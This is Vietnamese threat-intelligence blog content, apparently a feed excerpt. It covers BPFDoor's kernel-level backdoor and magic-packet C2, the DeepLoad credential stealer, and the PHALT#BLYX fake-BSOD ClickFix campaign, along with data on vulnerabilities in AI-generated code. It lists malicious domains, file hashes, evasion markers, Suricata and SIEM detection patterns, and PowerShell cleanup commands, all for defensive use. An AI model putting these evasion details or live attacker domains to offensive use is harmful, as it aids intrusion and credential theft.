<p>Sau một thời gian nâng cấp , các biến thể mới đã thay đổi chiến lược: <strong>Lưu trực tiếp malware xuống ổ đĩa (on-disk), giả mạo tiến trình hệ thống</strong> (ví dụ: daemon quản lý server) như này sẽ khiến nó trông giống phần mềm hợp lệ và khó bị nghi ngờ. Nói đơn giản: Từ “ẩn tạm thời” chuyển sang “ẩn lâu dài và hợp pháp hóa bản thân”.</p>
<h3>Kiến trúc điều khiển (C2)</h3>
<p>Nhóm <strong>Red Menshen</strong> sử dụng 2 cách chính để điều khiển BPFDoor: <strong>httpShell</strong> → ẩn trong traffic web và <strong>icmpShell</strong> → ẩn trong ping (ICMP).</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/98c159bd-0387-4eed-b4fa-fe5ce48d516e.png" alt="" style="display:block;margin:0 auto" />

<h3><strong>httpShell – Ẩn trong traffic HTTP</strong></h3>
<p>BPFDoor sẽ thực hiện theo dõi toàn bộ traffic mạng nhưng không ở mức ứng dụng mà ở <strong>kernel (rất sâu).</strong> Nghĩa là nó thấy packet <strong>trước cả firewall hoặc antivirus.</strong></p>
<p>Trong thực tế thì Internet thực tế có nhiều lớp (tunnel) như: GRE hoặc GTP (trong mạng viễn thông). httpShell có thể: “bóc” các lớp này ngay trong kernel và nhìn thấy dữ liệu bên trong. Giống như việc mở phong bì → rồi mở tiếp phong bì bên trong → cho đến khi thấy nội dung thật.</p>
<p>httpShell còn một khả năng là né <strong>firewall &amp; WAF,</strong> bình thường firewall/WAF sẽ kiểm tra vị trí dữ liệu trong packet. <strong>BPFDoor</strong> làm một trick rất thông minh chính là thêm padding (dữ liệu giả) cũng như ép đoạn nhận diện <code>"9999"</code> luôn nằm ở <strong>byte thứ 26.</strong> Kết quả để lại sẽ là dù packet bị thay đổi bởi proxy những malware vẫn tìm đúng “tín hiệu” để khai thác.</p>
<h3>icmpShell – Điều khiển qua ping</h3>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/af97678e-060e-4210-917a-d98b76eb76b5.png" alt="" style="display:block;margin:0 auto" />

<p>Biến thể này thay vì dùng HTTP nó sẽ thực hiện <strong>ICMP (ping)</strong> để giao tiếp và tạo một shell điều khiển hai chiều, điều này thường cực kỳ nguy hiểm bởi do ICMP thường không bị chặn.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/258dd019-0989-4ac8-beba-b9857d22a982.png" alt="" style="display:block;margin:0 auto" />

<p>Biến thể nguy hiểm này còn sử dụng <strong>kỹ thuật “biến đổi theo PID”.</strong> Tức là mỗi lần malware chạy thì nó có một <strong>PID (Process ID) khác nhau.</strong> BPFDoor lợi dụng điều này để gắn logic vào PID sau đó làm cho “signature” của nó thay đổi theo mỗi lần chạy. Hệ quả là firewall không thể viết rule cố định để chặn.</p>
<p>Một điểm nữa là cách hoạt động của biến thể này cũng vô cùng thông minh, thông thường malware cần server C2 cố định (IP/domain) nhưng <strong>BPFDoor</strong> thì không. Khi attacker gửi packet, malware không cần biết trước IP mà thay vào đó nó chỉ cần đọc source IP của packet sau đó thực hiện kết nối ngược lại. Hiểu đơn giản là attacker có thể điều khiển từ bất kỳ đâu mà không cần hạ tầng cố định.</p>
<p>Trong trường hợp mà không thể kết nối malware biến máy bị nhiễm thành <strong>relay,</strong> gửi ICMP sang máy khác trong mạng nội bộ. Điều này còn nguy hiểm hơn giúp biến thể lan sâu hơn vào hệ thống giống như một router bí mật.</p>
<h2>Điều gì làm BPFDoor nguy hiểm?</h2>
<p>Hoạt động ở kernel gần như “vô hình” với antivirus.</p>
<p>Không cần C2 cố định chính vì thế mà không thể block bằng IP/domain.</p>
<p>Dùng giao thức hợp lệ nhưng bên trong lại là <strong>kênh điều khiển bí mật.</strong></p>
<ul>
<li><p>HTTP → bình thường</p>
</li>
<li><p>ICMP → bình thường</p>
</li>
<li><p>NTP → bình thường</p>
</li>
</ul>
<p>Thay đổi liên tục với signature không cố định cũng như rất khó detect bằng rule.</p>
<h2>Nhận định chuyên gia &amp; kết luận</h2>
<p>Sự dịch chuyển logic của bộ lọc BPF filter từ việc áp khởi tạo socket SOCK_RAW sang SOCK_DGRAM mang lại góc nhìn rõ nét về mục tiêu của Red Menshen. Nhóm đang chủ động tinh giản hóa quy trình bóc tách gói tin ảo, nhường việc phân rã những lớp mạng viễn thông hóc búa (như IPsec, thiết lập GRE node) cho chính kernel của server mục tiêu. Hệ thống máy chủ điều khiển viễn thông thường duy trì một network array đa tầng rất nặng nề; sự tinh chỉnh này giúp BPFDoor loại bỏ hẳn những thư viện giải mã cồng kềnh, thu hẹp dung lượng hệ số lây nhiễm và rủi ro gây crash trên tiến trình lõi của hệ thống mạng quốc gia.</p>
<p>Ngoài ra, việc mã độc định danh đích xác tiến trình ngụy trang theo format HPE Insight Management (cmathreshd) có lệnh -p 5 -s OK riêng biệt để thả vào phần cứng Bare-Metal của HPE ProLiant chứng tỏ chiến dịch APT này nắm rất rõ kiến trúc hạ tầng mà victim - đặc biệt là các cụm lõi truyền thông 4G/5G của Ericsson - đang vận hành.</p>
<p>Việc biến thể lưu vết thẳng tệp ẩn hệ thống vào directory /var/run/user/0 thay vì sử dụng tập lệnh chmod cho phép attacker tránh thao tác sửa quyền thực thi lưu vào file auditd log. Đây là một mũi khoan cực hiểm đánh sập logic phát hiện file độc hại của các nền tảng host-monitoring EDR tại Việt Nam hiện tại.</p>
<h2><strong>Khuyến nghị</strong></h2>
<p><strong>Immediate (0-24h)</strong></p>
<ul>
<li><p>Tiến hành truy tìm trên hạ tầng mạng những kết nối gói ICMP chứa <code>Sequence Number = 1234</code> và mang theo giá trị <code>ICMP Code 1</code> không hợp lệ. Đây là các beaconing heartbeat bộc lộ điểm mù của biến thể.</p>
</li>
<li><p>Kiểm tra danh sách tiến trình trên máy chủ Linux, chú trọng việc thực thi trực tiếp các process root mask như <code>zabbix_agentd</code>, <code>dockerd</code> hoặc <code>cmathreshd</code> không có ánh xạ thực tiễn tới /bin hay thư mục cài phần mềm. Khuyến khích quản trị viên vận hành ngay script <code>rapid7_bpfdoor_</code><a href="http://check.sh"><code>check.sh</code></a> để bắt được filter logic ghim vào các gói AF_PACKET.</p>
</li>
</ul>
<p><strong>Short-term (1-7 ngày)</strong></p>
<ul>
<li><p>Chặn khẩn cấp và rà soát kết nối các endpoint phân giải DNS sau: <a href="http://ntpussl.instanthq.com"><code>ntpussl.instanthq.com</code></a>, <a href="http://ntpupdate.ddnsgeek.com"><code>ntpupdate.ddnsgeek.com</code></a>, <a href="http://ntpd.casacam.net"><code>ntpd.casacam.net</code></a>, <a href="http://ntpupdate.ygto.com"><code>ntpupdate.ygto.com</code></a>.</p>
</li>
<li><p>Thay đổi mô hình rule detect phụ thuộc payload, áp dụng chỉ số nhận diện cấu trúc. Cập nhật rule Suricata để match byte level từ BPF backdoor như:<br /><code>udp[8:2] == 0x3182 or (icmp[8:2] == 0x1051 and icmp[icmptype] == icmp-echo)</code></p>
</li>
</ul>
<p><strong>Long-term</strong></p>
<ul>
<li><p>Bổ sung các rule giám sát vào module hệ thống auditd, theo dõi chặt mọi thao tác tạo socket hệ thống dưới nhãn <code>AF_PACKET</code>, cụ thể nhắm tới lệnh <code>setsockopt</code> dùng để gắn chuỗi filter BPF lên kernel.</p>
</li>
<li><p>Tái cấu trúc cơ chế phân quyền chạy dịch vụ bằng root trên các cụm lõi core viễn thông vật lý. Triển khai sâu hệ thống File Integrity Monitoring (FIM) để vá ngay các đường lây lan thư mục <code>/run</code> tạm thời.</p>
</li>
</ul>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th><strong>Tactic</strong></th>
<th><strong>Technique ID</strong></th>
<th><strong>Technique Name</strong></th>
<th><strong>Cách BPFDoor sử dụng</strong></th>
</tr>
</thead>
<tbody><tr>
<td>Execution</td>
<td>T1059</td>
<td>Command and Scripting Interpreter</td>
<td>Cung cấp shell từ xa qua HTTP / ICMP</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1036</td>
<td>Masquerading</td>
<td>Giả mạo process hệ thống hợp pháp</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1543</td>
<td>Create or Modify System Process</td>
<td>Có thể tạo service để duy trì persistence</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1014</td>
<td>Rootkit</td>
<td>Sử dụng BPF trong kernel để ẩn hoạt động</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1620</td>
<td>Reflective Code Loading</td>
<td>Chạy fileless từ <code>/dev/shm</code></td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1027</td>
<td>Obfuscated/Compressed Files and Information</td>
<td>Magic packet được encode, marker cố định</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1070</td>
<td>Indicator Removal on Host</td>
<td>Xóa dấu vết file/process</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1071</td>
<td>Application Layer Protocol</td>
<td>Giao tiếp qua HTTP (httpShell)</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1095</td>
<td>Non-Application Layer Protocol</td>
<td>Tunnel qua ICMP (icmpShell)</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1094</td>
<td>Custom C2 Protocol</td>
<td>Magic packet + Hidden IP (HIP)</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1090</td>
<td>Proxy</td>
<td>Relay traffic qua host bị nhiễm</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1001</td>
<td>Data Obfuscation</td>
<td>Padding + che giấu dữ liệu trong packet</td>
</tr>
<tr>
<td>Discovery</td>
<td>T1046</td>
<td>Network Service Discovery</td>
<td>Sniff traffic thụ động qua BPF</td>
</tr>
<tr>
<td>Lateral Movement</td>
<td>T1021</td>
<td>Remote Services</td>
<td>Pivot sang host khác qua tunnel</td>
</tr>
<tr>
<td>Collection</td>
<td>T1040</td>
<td>Network Sniffing</td>
<td>Bắt packet trực tiếp ở kernel level</td>
</tr>
</tbody></table>
<h2><strong>IOCs</strong></h2>
<p><strong>BPFDoor Controller</strong></p>
<p>6227cb77cb4ab1d066eebf14e825dbc0a0a7f1e9 64171d46c8290c5cd88e0fbce9e23dcecbe20865 65e4d507b1de3a1e4820e4c81808fdfd7e238e10 9bb8977cd5fc7be484286be8124154ab8a608d96</p>
<p><strong>BPFDoor Malware</strong></p>
<p>02aebc3762e766be0ac24ef57a135398344a8f7e 04aa241c574f0a7ec93ba5d27807d8e78467f21e 16f94f0df6003f1566b2108f55e247f60a316185 1db21dbf41de5de3686195b839e74dc56d542974 28765121730d419e8656fb8d618b2068408fe5ae 291af8adf6fa078692d0bf5e0d9d00c376bb3fff 316ac8215095a24429632849407311b18a16e0cf 351febd645c66a3c9a79253d0aefcce8ff77054c 3771319be1c8883610c65977811e93b0bdaddf6f 4181bc848a1cd32911a83e02feac9b8abbd69ae2 43b4dbc71ada99a7b8a8d6d0490ba5526a34f9a0 4b1ea5e7b28eb110d8741b76d34f7dbae6f13b79 4c89beab00e3119cf516d6f98d364a5d99232181 5ddcbe4b591293f7b34fc0ef65db6248bcc67eb6 64171d46c8290c5cd88e0fbce9e23dcecbe20865 7ab39d7aad49abb0f626383ed776fe20a3b4c8f3 88075bbc34655d1fa2a750f3bbdee38214974009 8b5844fcbf6af23bc0b410fc180e7e6bdd4f35c7 8ebe1a71af1061d9e943bdff46c5ed954d8c9348 937f6068df4e091cf92d50afb3c6b7cad1de6230 9bdea37835cdb7f0b291891386af28184ac85f79 a6b66b8b7eae2969fd7237888d30766baa1b2274 be47b0c2fb328a338874f6efbe8305ddb74f6a48 c38fc109e31c9d67a1efc6cb767f826b7e46fb19 c54e214810ca7042d013845076b0360bdd7132b2 c83651d7706efa8c115f2a0edb07f863f4e79ce5 d53b7d0030a095a3ffa4b67d13de82d08adda248 d61bf187c4cd3f9953b567b3ad320b9ecde1c347 d9037e0de902e6f7b6c5f1b3269ba482f5e67c8a dc94eaa39e11f2ca7739d2cfded9eec1967f33ee dd8db29e90c6b52ee3d2723cc168cf33ee0bb521 e17ddb6515f2d399552245191f98458b68fece7b ef03b84048193a158ecf1f7033ab0cc8869dd2a5 f61589b1f86d8692964a6bd3e96ddadbe22994eb fb488cdfd2e475f0d5cbecfe11e9bab2241f9d50</p>
<h2><strong>Tham khảo</strong></h2>
<p><a href="https://www.rapid7.com/blog/post/tr-new-whitepaper-stealthy-bpfdoor-variants/">New Whitepaper: Stealthy BPFDoor Variants are a Needle That Looks Like Hay</a></p>
<p><a href="https://thehackernews.com/2026/03/china-linked-red-menshen-uses-stealthy.html">China-Linked Red Menshen Uses Stealthy BPFDoor Implants to Spy via Telecom Networks</a></p>
<p><a href="https://www.securityweek.com/chinese-hackers-caught-deep-within-telecom-backbone-infrastructure/">Chinese Hackers Caught Deep Within Telecom Backbone Infrastructure - SecurityWeek</a></p>
<p><a href="https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html">BPFDoors Hidden Controller Used Against Asia, Middle East Targets | Trend Micro (US)</a></p>
]]></content:encoded></item><item><title><![CDATA[AI Trong Hai Chiến Tuyến: Vũ Khí Của Kẻ Tấn Công Và Lỗ Hổng Trong Code Của Bạn]]></title><description><![CDATA[Tóm Tắt
Ba sự kiện riêng biệt trong vài tháng qua, khi đặt cạnh nhau, phác thảo một bức tranh đáng lo ngại về hướng đi của mối đe dọa hiện đại: DeepLoad — malware credential stealer dùng AI tạo obfusc]]></description><link>https://blog.fiscybersec.com/ai-trong-hai-chien-tuyen-deepload-clickfix-bsod-ai-code-security</link><guid isPermaLink="true">https://blog.fiscybersec.com/ai-trong-hai-chien-tuyen-deepload-clickfix-bsod-ai-code-security</guid><category><![CDATA[AI]]></category><category><![CDATA[Clickfix]]></category><category><![CDATA[phishing]]></category><category><![CDATA[stealer]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Vũ Nhật Lâm]]></dc:creator><pubDate>Wed, 08 Apr 2026 02:53:32 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/676511773cdd3c06f7b226ee/21c65cc9-6f07-44a7-a05e-220e2003a144.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Tóm Tắt</h2>
<p>Ba sự kiện riêng biệt trong vài tháng qua, khi đặt cạnh nhau, phác thảo một bức tranh đáng lo ngại về hướng đi của mối đe dọa hiện đại: <strong>DeepLoad</strong> — malware credential stealer dùng AI tạo obfuscation để né static detection và lây lan vào enterprise qua ClickFix; <strong>PHALT#BLYX</strong> — chiến dịch ClickFix mới nhắm vào ngành hospitality châu Âu bằng fake Blue Screen of Death triển khai DCRat; và <strong>dữ liệu từ Veracode và Georgia Tech</strong> xác nhận AI-generated code đang đưa lỗ hổng vào production với tốc độ chưa từng có.</p>
<p>Điểm hội tụ của cả ba: <strong>AI đang được khai thác đồng thời ở cả hai phía của chiến tuyến</strong> — accelerate developer productivity và amplify attacker capability. Và cả hai vecto đó đang gặp nhau tại điểm đến cuối cùng là tổ chức của bạn.</p>
<p><strong>Hành động ưu tiên:</strong> Kiểm tra WMI subscriptions trên tất cả Windows endpoints đã tiếp nhận phishing trong 30 ngày qua, bật PowerShell Script Block Logging nếu chưa có, và audit quy trình code review để phủ AI-generated code.</p>
<hr />
<h2>1. DeepLoad: Khi AI Viết Malware Để Né AI-Powered Defense</h2>
<h3>Attack Chain</h3>
<p>Báo cáo từ ReliaQuest (tháng 3/2026) mô tả <strong>DeepLoad</strong> là một credential stealer enterprise-grade với một đặc điểm nổi bật: cấu trúc evasion của nó được thiết kế có chủ đích để vô hiệu hóa từng lớp control mà phần lớn tổ chức đang dựa vào.</p>
<p>Infection bắt đầu bằng <strong>ClickFix</strong> — kẻ tấn công hiển thị một trang lỗi browser giả mạo, thuyết phục nhân viên paste một PowerShell command vào Windows Run dialog để "khắc phục sự cố". Một thao tác. Không cần khai thác lỗ hổng phần mềm. Không cần đặc quyền admin ban đầu.</p>
<p>Command đó thực hiện bốn việc cùng lúc:</p>
<ul>
<li>Tạo scheduled task để loader tự khởi động lại sau mỗi reboot</li>
<li>Dùng <code>mshta.exe</code> — Windows utility hợp lệ — để fetch payload từ infrastructure của attacker</li>
<li>Kích hoạt <code>filemanager.exe</code> (tên được chọn để blend vào process list) — standalone credential stealer chạy trên C2 channel riêng</li>
<li>Cài một malicious browser extension thu thập passwords và session tokens theo thời gian thực</li>
</ul>
<p><strong>Staging domains được quan sát phục vụ malicious content trong vòng 22 phút sau khi go live</strong> — con số này nói lên rằng IOC-based blocking dựa vào threat feeds với độ trễ hàng giờ hoặc hàng ngày thực tế không có giá trị với campaign này.</p>
<h3>AI-Generated Obfuscation: Signature-Based Detection Đã Không Còn Đủ</h3>
<p>Đây là phần đáng chú ý nhất về mặt kỹ thuật. PowerShell loader của DeepLoad được độn bằng <strong>hàng nghìn phép gán biến vô nghĩa</strong> — code syntactically hợp lệ nhưng không thực hiện bất kỳ logic nào. Logic thực sự — một đoạn XOR decryption routine ngắn — nằm ở cuối script và decrypt shellcode <strong>hoàn toàn trong memory</strong>, không ghi bất kỳ thứ gì ra disk.</p>
<p>ReliaQuest nhận định với <strong>high confidence</strong> rằng lớp obfuscation này được tạo bởi AI. Implication không nhỏ: thay vì một analyst ngồi viết junk code thủ công, AI có thể regenerate lớp padding này thành một variant mới với signature khác trong vài giây. Defenders không còn có thể đuổi theo từng variant — họ phải hunt behavior thay vì pattern.</p>
<p>Để né file-based detection tiếp tục, DeepLoad dùng <code>Add-Type</code> của PowerShell để <strong>compile một C# injector trực tiếp trên máy nạn nhân</strong>, tạo ra một DLL với tên ngẫu nhiên. DLL này được biên dịch fresh mỗi lần thực thi — signature-based tools không có gì để match.</p>
<p>Payload sau đó inject vào <strong><code>LockAppHost.exe</code></strong> — Windows process quản lý lock screen. Đây là lựa chọn có tính toán: <code>LockAppHost.exe</code> không có lý do gì để khởi tạo outbound network connections, nên phần lớn security tools không monitor nó. Bất kỳ kết nối ra ngoài nào từ process này đều là anomaly rõ ràng — nhưng chỉ nếu bạn đang theo dõi nó.</p>
<h3>Persistence Vượt Qua Remediation Thông Thường</h3>
<p>Đây là điểm làm incident responder đau đầu nhất: <strong>trong một trường hợp được xác nhận, DeepLoad tái xuất hiện ba ngày sau khi host trông đã sạch hoàn toàn</strong>.</p>
<p>Cơ chế: một <strong>WMI event subscription</strong> được plant trong quá trình initial compromise. WMI subscriptions nằm ngoài phạm vi của quy trình remediation thông thường — xóa scheduled tasks, xóa temporary files, reinstall browser extension không đụng đến WMI. Subscription âm thầm drop <code>filemanager.exe</code> trở lại vào thư mục Downloads của user mà không cần bất kỳ tương tác nào.</p>
<p>Hệ quả thực tiễn: nếu bạn không explicitly audit và xóa WMI event subscriptions trước khi trả host về production, host đó chưa sạch.</p>
<h3>Lây Lan Qua USB</h3>
<p>Trong vòng <strong>10 phút</strong> sau initial infection, DeepLoad đã ghi hơn <strong>40 file</strong> vào USB drive được kết nối — được ngụy trang thành Chrome setup, Firefox installer, AnyDesk shortcut. Attacker infrastructure có dedicated <code>/t1_usb</code> tracking path, cho thấy USB propagation là feature được thiết kế có chủ đích, không phải side effect. Bất kỳ machine nào user cắm USB vào sau đó là một potential victim mới.</p>
<hr />
<h2>2. PHALT#BLYX: ClickFix Tiến Hóa Thêm Một Bước — Fake BSOD</h2>
<h3>Tổng Quan Chiến Dịch</h3>
<p>Trong khi DeepLoad dùng fake browser error, <strong>PHALT#BLYX</strong> (được track bởi Securonix, phát hiện tháng 12/2025) đẩy ClickFix lên một mức thuyết phục khác bằng cách lạm dụng một trong những hình ảnh đáng sợ nhất với người dùng Windows: <strong>màn hình xanh chết chóc (BSOD)</strong>.</p>
<p>Mục tiêu: ngành hospitality châu Âu, thời điểm triển khai chiến dịch: cao điểm mùa lễ. Kết quả cuối: triển khai <strong>DCRat</strong> — một remote access trojan có liên kết với Russian-speaking developers, cho phép remote access toàn diện và deploy secondary payloads.</p>
<h3>Kill Chain Chi Tiết</h3>
<p><strong>Bước 1 — Phishing email giả Booking.com:</strong>
Nạn nhân nhận email thông báo hủy đặt phòng đột ngột với số tiền phạt tính bằng Euro — detail này xác nhận campaign đang nhắm vào tổ chức châu Âu. Email chứa link dẫn đến một clone site của Booking.com (ví dụ: <code>low-house[.]com</code>) được thiết kế đủ chính xác để qua mắt nhân viên đang bận trong mùa cao điểm.</p>
<p><strong>Bước 2 — Fake "page loading" error:</strong>
Khi nạn nhân click "See Details", website hiển thị lỗi page loading, yêu cầu click "Refresh". Đây là bước tạo tâm lý quen thuộc — người dùng đã được điều kiện hóa để refresh khi web chậm.</p>
<p><strong>Bước 3 — Fake CAPTCHA → Fake BSOD:</strong>
Browser chuyển sang <strong>full-screen mode</strong> và hiển thị màn hình BSOD giả mạo hoàn chỉnh. Nạn nhân được hướng dẫn mở Windows Run dialog (Win + R) và nhấn Ctrl+V — command độc hại đã được tự động copy vào clipboard từ bước trước. Nhấn Enter là đủ để bắt đầu infection.</p>
<p>Điểm đáng chú ý: BSOD thật không bao giờ cung cấp recovery instructions hay yêu cầu người dùng nhập lệnh. Nhưng với nhân viên front desk dưới áp lực giải quyết tranh chấp khách hàng, đây là detail họ có thể bỏ qua.</p>
<p><strong>Bước 4 — Multi-stage payload delivery:</strong>
Command PowerShell download một <code>.NET project file (.proj)</code> và <strong>compile nó bằng <code>MSBuild.exe</code></strong> — công cụ build hợp lệ của Microsoft. Đây là kỹ thuật Living Off The Land (LoTL) tinh vi: không drop binary ngoại lai, dùng compiler của chính Windows để tạo malware ngay trên máy nạn nhân. File được compile sau đó tải DCRat.</p>
<p><strong>Bước 5 — DCRat installation:</strong>
DCRat cung cấp cho kẻ tấn công: remote shell, file transfer, keylogging, screenshot capture, và khả năng load secondary plugins. Cyrillic debug strings và cấu trúc code có điểm tương đồng với AsyncRAT cho thấy nguồn gốc Russian-speaking developers.</p>
<h3>IOC — PHALT#BLYX</h3>
<pre><code># Phishing/redirect domains
low-house[.]com
oncameraworkout[.]com
 
# Suspicious processes to monitor
MSBuild.exe  ← nếu spawned bởi mshta.exe hoặc PowerShell, cần điều tra
mshta.exe    ← bất kỳ outbound connection nào từ process này
 
# File indicators
*.proj files trong %TEMP% hoặc %ProgramData%
Internet Shortcut (.url) files trong Startup folder
Suspicious entries trong %ProgramData%
</code></pre>
<hr />
<h2>3. AI-Generated Code: Lỗ Hổng Đang Vào Production Ở Tốc Độ Chưa Từng Có</h2>
<h3>Bức Tranh Hiện Tại</h3>
<p>Nếu DeepLoad và PHALT#BLYX cho thấy AI đang được weaponize ở phía tấn công, thì dữ liệu từ nghiên cứu năm 2025–2026 phác thảo một vấn đề song song ở phía phòng thủ: <strong>AI-generated code đang tạo ra lỗ hổng với tốc độ mà quy trình security review truyền thống không theo kịp</strong>.</p>
<p>Một số con số đáng chú ý:</p>
<p>Veracode test hơn 100 LLM trên 4 ngôn ngữ (Java, Python, C#, JavaScript): <strong>45% code samples đưa vào OWASP Top 10 vulnerabilities</strong>. Java là ngôn ngữ tệ nhất với <strong>72% security failure rate</strong>. AI-generated code có <strong>2.74x nhiều vulnerabilities hơn code viết bởi con người</strong>.</p>
<p>Apiiro phân tích Fortune 50 enterprises: <strong>322% nhiều privilege escalation paths hơn</strong> trong AI-generated code so với human-written code. <strong>153% nhiều design flaws hơn</strong>. Tính đến tháng 6/2025, AI-generated code đang thêm hơn <strong>10.000 security findings mới mỗi tháng</strong> — tăng 10 lần so với tháng 12/2024.</p>
<p>Georgia Tech's Vibe Security Radar (track từ tháng 5/2025): tháng 1/2026 có 6 CVE trực tiếp từ AI-generated code, tháng 2 tăng lên 15, tháng 3 lên <strong>35 CVE trong một tháng</strong>. Tính đến ngày 20/03/2026: <strong>74 CVE xác nhận</strong> trong tổng số 43.849 advisory được phân tích có thể quy trực tiếp cho AI-generated code. Researcher Hanqing Zhao nhấn mạnh đây là <strong>lower bound</strong>, không phải tỷ lệ.</p>
<h3>Tại Sao AI Code Lại Insecure?</h3>
<p>Câu trả lời nằm ở cách LLM học và generate code. <strong>AI coding tools không hiểu security intent</strong> — chúng reproduce code dựa trên prevalence trong training data. Nếu training data chứa nhiều code vulnerable hơn code secure cho một pattern nhất định, model sẽ suggest code vulnerable. Đây không khác gì copy-paste từ Stack Overflow mà không review, chỉ là ở scale lớn hơn và nhanh hơn.</p>
<p>Một vấn đề cụ thể: <strong>AI có xu hướng ingest vulnerable hoặc deprecated dependencies</strong> vào các project mới khi giải quyết coding task. Một dependency được pull trong year 2019 và không được maintain có thể trông "đúng" với AI — nó xuất hiện trong training data và giải quyết bài toán về mặt chức năng. Security context không nằm trong reasoning.</p>
<p>Điều đáng lo ngại hơn: một <strong>Snyk survey cho thấy gần 80% developers nghĩ AI-generated code an toàn hơn</strong> — một false sense of security nguy hiểm. Kết quả: code được push vào production với ít scrutiny hơn, không phải nhiều hơn.</p>
<h3>Điểm Giao Thoa Với Threat Landscape</h3>
<p>Đây là nơi ba chủ đề trong bài này kết nối: DeepLoad được thiết kế bởi kẻ tấn công biết rằng defenders đang dựa vào static scanning và signature matching. Nếu defenders đang generate security code bằng AI nhưng AI code có 45% failure rate, và attackers đang dùng AI để tạo ra malware né detection — thì cuộc đua đang nghiêng về phía nào?</p>
<p>Nguyên tắc cơ bản cũng bị đảo lộn: nếu AI code có thể introduce supply chain vulnerabilities (như Endor Labs và TechTarget đều document), và ClickFix campaigns như PHALT#BLYX đang target developers và enterprise staff với increasing sophistication — thì một developer vibe-coding một internal tool và một kẻ tấn công dùng ClickFix để gain foothold vào developer machine của họ là hai vecto song hành, không phải riêng biệt.</p>
<hr />
<h2>4. Nhận Định</h2>
<p>Ba thread này hội tụ ở một điểm mà chúng tôi cho là cần được nói thẳng: <strong>quy trình security mà phần lớn tổ chức đang dùng được xây dựng để chống lại một threat model đã cũ</strong>.</p>
<p>Static scanning không bắt được malware generated fresh mỗi lần execution. Signature matching không bắt được variant được tạo lại bằng AI trong vài giây. WMI-based persistence không bị loại bỏ bởi "xóa scheduled tasks và reimage". Browser-based ClickFix không bị chặn bởi mail filter. Và AI-generated code không tự động secure chỉ vì developer không phải là người viết từng dòng.</p>
<p>Về <strong>DeepLoad</strong> cụ thể: cả hai incident trong báo cáo ReliaQuest đều có một điểm chung là một người dùng bình thường, không phải admin, đã paste một command vào Windows Run dialog. Đây không phải lỗ hổng kỹ thuật — đây là social engineering gap. Security awareness training về ClickFix chưa đủ phổ biến so với awareness về phishing email truyền thống.</p>
<p>Với các tổ chức trong khu vực Đông Nam Á: hospitality và travel sector là mục tiêu rõ ràng của PHALT#BLYX — và đây là ngành đang tăng trưởng mạnh tại Việt Nam. Nhân viên front desk xử lý đặt phòng, nhận email từ Booking.com, và thường chịu áp lực cao vào peak season — đây là perfect target cho lure thiết kế của campaign này. Adaptation của campaign sang tiếng Việt và lure địa phương (VND thay vì EUR) không đòi hỏi effort lớn từ phía attacker.</p>
<p>Trend lớn hơn: <strong>ClickFix đang trở thành delivery mechanism ưa thích vì nó bypass cả email filtering lẫn web proxy</strong>. Nếu người dùng là người chạy lệnh, không có security control nào ở giữa. Gần như mọi dạng lure đã được thử nghiệm trong các ClickFix campaign: fake CAPTCHA, fake browser update, fake Office error, fake VPN reconnect, và bây giờ là BSOD. Không có dấu hiệu dừng lại.</p>
<hr />
<h2>5. Khuyến Nghị</h2>
<h3>Ngay lập tức (0–24h)</h3>
<p><strong>Với DeepLoad / ClickFix exposure:</strong></p>
<pre><code class="language-powershell"># Audit WMI event subscriptions — đây là hidden persistence thường bị bỏ sót
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class __EventConsumer
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
 
# Xóa unauthorized subscription (thay &lt;Name&gt; bằng tên thực tế)
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | `
  Where-Object { $_.Filter -like "*&lt;suspicious_name&gt;*" } | Remove-WmiObject
 
# Kiểm tra LockAppHost.exe có network activity không
# (trong EDR/Sysmon: process = LockAppHost.exe AND event_type = network)
</code></pre>
<pre><code class="language-powershell"># Bật PowerShell Script Block Logging (nếu chưa có)
$regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "EnableScriptBlockLogging" -Value 1
</code></pre>
<p><strong>Rotate credentials</strong> trên tất cả hosts có dấu hiệu ClickFix execution trong 30 ngày qua (nhìn lại Event Log cho <code>mshta.exe</code> hoặc PowerShell với <code>-ExecutionPolicy Bypass</code>).</p>
<p><strong>Audit USB drives</strong> kết nối với bất kỳ host nào nghi ngờ trong cùng khoảng thời gian.</p>
<h3>Ngắn hạn (1–7 ngày)</h3>
<p><strong>Detection rules cần triển khai:</strong></p>
<pre><code># Splunk/Elastic — Detect ClickFix execution pattern
process_name="mshta.exe" AND parent_process_name IN ("explorer.exe", "cmd.exe") 
AND cmdline LIKE "*.hta*"
 
# Flag LockAppHost.exe spawning children hoặc initiating network
process_name="LockAppHost.exe" AND (event_type="process_create" OR event_type="network")
 
# Flag MSBuild.exe spawned bởi script engine (PHALT#BLYX pattern)
process_name="MSBuild.exe" AND parent_process_name IN ("powershell.exe", "mshta.exe", "wscript.exe")
 
# WMI persistence creation
event_id=5861 AND source="Microsoft-Windows-WMI-Activity"
</code></pre>
<p><strong>Security awareness:</strong> Brief nhanh cho tất cả users: không bao giờ paste command vào Windows Run dialog hoặc PowerShell từ hướng dẫn trên website, kể cả khi site trông giống Booking.com, Microsoft, hay bất kỳ vendor nào.</p>
